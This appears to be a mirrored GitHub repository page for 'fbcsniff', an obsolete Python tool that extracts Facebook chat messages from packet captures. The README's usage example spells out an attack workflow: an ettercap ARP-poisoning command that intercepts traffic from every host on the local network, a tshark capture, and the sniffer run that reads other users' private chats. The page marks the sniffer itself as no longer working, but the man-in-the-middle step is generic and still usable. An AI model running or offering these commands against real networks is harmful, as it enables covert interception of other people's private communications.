https://github.com/icholy/fbcsniff
facebook chat sniffer (obsolete)
https://github.com/icholy/fbcsniff
Last synced: 4 months ago
JSON representation
facebook chat sniffer (obsolete)
- Host: GitHub
- URL: https://github.com/icholy/fbcsniff
- Owner: icholy
- Created: 2013-10-18T15:25:27.000Z (over 11 years ago)
- Default Branch: master
- Last Pushed: 2013-10-18T15:44:46.000Z (over 11 years ago)
- Last Synced: 2025-01-30T03:13:23.388Z (6 months ago)
- Language: Python
- Homepage:
- Size: 113 KB
- Stars: 1
- Watchers: 3
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# FBCSNIFF: Facebook Chat Sniffer
> Extract facebook chat messages from a pcap file
## THIS DOES NOT WORK ANYMORE!
### Deps:
``` sh
$ sudo apt-get install python-dpkt
```### Options:
```
usage: python fbcsniff.py [OPTIONS] -c-c
-f (comma separated)
-s (use with -l)
-o
-l (keep looking for new messages)
-h (show this message)
```### Usage Example:
I'm using ettercap and tshark
``` sh
$ sudo apt-get install ettercap tshark
```Start a MITM attach using ettercap **(this will poison EVERYONE!)**:
``` sh
$ sudo ettercap -T -M arp -i // // -p auto_add
```Start tshark capture:
``` sh
$ sudo -i
$ tshark -i -w /tmp/capture.pcap
```Start pulling messages out of the capture file:
``` sh
$ sudo ./fbcsniff.py -l -c /tmp/capture.pcap
```